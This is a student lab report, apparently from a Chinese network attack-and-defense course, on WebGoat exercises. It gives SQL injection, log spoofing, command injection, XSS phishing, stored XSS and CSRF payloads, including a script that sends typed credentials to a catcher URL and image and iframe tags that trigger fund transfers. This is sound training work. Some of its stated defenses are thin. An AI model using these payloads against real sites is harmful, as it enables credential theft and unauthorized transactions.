2018-2019-2 20165227《網絡對抗技術》Exp9 Web安全基礎

2018-2019-2 20165227《網絡對抗技術》Exp9 Web安全基礎

問題回答

一、SQL注入攻擊原理，如何防護

• 原理解釋：經過在用戶名、密碼登輸入框中輸入特殊字符，在處理字符串與sql語句拼接過程當中實現引號閉合、註釋部分SQL語句，利用永真式，從而達到登陸、顯示信息等目的
• 防護措施：對於輸入框的輸入進行有效的限制，好比對輸入的長度、非法字符等進行限制，能夠抵禦必定的攻擊

二、XSS攻擊的原理，如何防護

• 原理解釋：XSS是一種常常出如今web應用中的計算機安全漏洞，它容許惡意web用戶將代碼（如，HTML代碼和客戶端腳本）植入到提供給其它用戶使用的頁面中，攻擊者能夠利用XSS漏洞旁得到訪問控制
• 防護措施：對於JSP的進行必定的特徵收集，對於其內容嚴格驗證並規定其格式

三、CSRF攻擊原理，如何防護

• 原理解釋：CSRF跨站請求僞造，也被稱爲「oneclickattack」或者sessionriding，一般縮寫爲CSRF或者XSRF，是一種對網站的惡意利用，經過假裝來自受信任用戶的請求來利用受信任的網站。是一種依賴web瀏覽器的、被混淆過的代理人攻擊
• 防護措施：在結束瀏覽器的會話後，對cookie進行清理

實驗步驟：

準備

• 安裝Webgoat（在網上找到並下載安裝包 ）
  

• 瀏覽器登錄http://localhost:8080/WebGoat 進入Webgoat，用下方的用戶名及密碼進行登錄
  

• 登錄成功界面
  

實驗一：SQL注入攻擊

Numeric SQL Injection攻擊

• 在複選框上右鍵，選擇inspect Element，對源代碼進行修改，在源代碼複選框內容第一排後添加or 1=1
  

• 成功
  

Log Spoofing攻擊

• 在頁面中的User Name 中填寫20165227%0d%0aLogin Succeeded !admin
• 成功
  

Command Injection攻擊

• 在複選框上右鍵，選擇inspect Element，對源代碼進行修改，在複選框的某一選項中加入"& netstat -an & ipconfig"
  

• 顯示攻擊後的結果
  

實驗二：XSS攻擊

Phishing with XSS攻擊

• 在搜索框輸入攻擊代碼

</form>
  <script>
function hack(){ 
XSSImage=new Image;
XSSImage.src="http://localhost:8080/WebGoat/catcher?PROPERTY=yes&user=" + document.phish.user.value + "&password=" + document.phish.pass.value + "";
alert("Had this been a real attack... Your credentials were just stolen. User Name = " + document.phish.user.value + " Password = " + document.phish.pass.value);
} 
  </script>
<form name="phish">
<br>
<br>
<HR>
  <H2>This feature requires account login:</H2>
<br>
  <br>Enter Username:<br>
  <input type="text" name="user">
  <br>Enter Password:<br>
  <input type="password" name = "pass">
<br>
  <input type="submit" name="login" value="login" onclick="hack()">
</form>
<br>
<br>
<HR>

• 在下方的登錄界面輸入的用戶名及密碼就會被捕獲並返回給你
  

Stored XSS Attacks攻擊

• 在要發佈的Massage部分插入JSP代碼，當帖子被瀏覽時候，該代碼會被瀏覽器解析成html的內容。
• 在其中輸入<script>alert("5228 is 5227's son");</script>
  

實驗三：CSRF攻擊

Cross Site Request Forgery攻擊

• 寫一個URL，讓用戶點擊，從而觸發攻擊
• 以圖片的形式將URL放入Massage框中，讓用戶錯覺得接收到的是一張圖，一旦點擊，就會觸發CSRF事件
• 內容爲<img src="http://localhost:8080/WebGoat/attack?Screen=276&menu=900&transferFunds=10000"/>
  

CSRF Prompt By-Pass攻擊

• 在message框中輸入代碼

<iframe src="attack?Screen=324&menu=900&transferFunds=5000"> </iframe>
<iframe src="attack?Screen=324&menu=900&transferFunds=CONFIRM"> </iframe>

• 結果
  

實驗問題

• 在登錄Webgoat的時候，界面顯示有問題，找不到攻擊的教程經過同窗的幫助才知道是JDK的版本不適配
  

• 經過同窗的幫助才知道是JDK的版本不適配，從新安裝了JDK1.8
  

實驗感想

• 此次的實驗有對於SQL語句和網頁HTML的要求，對於以後的考試內容也頗有幫助，也是一次頗有意思的實驗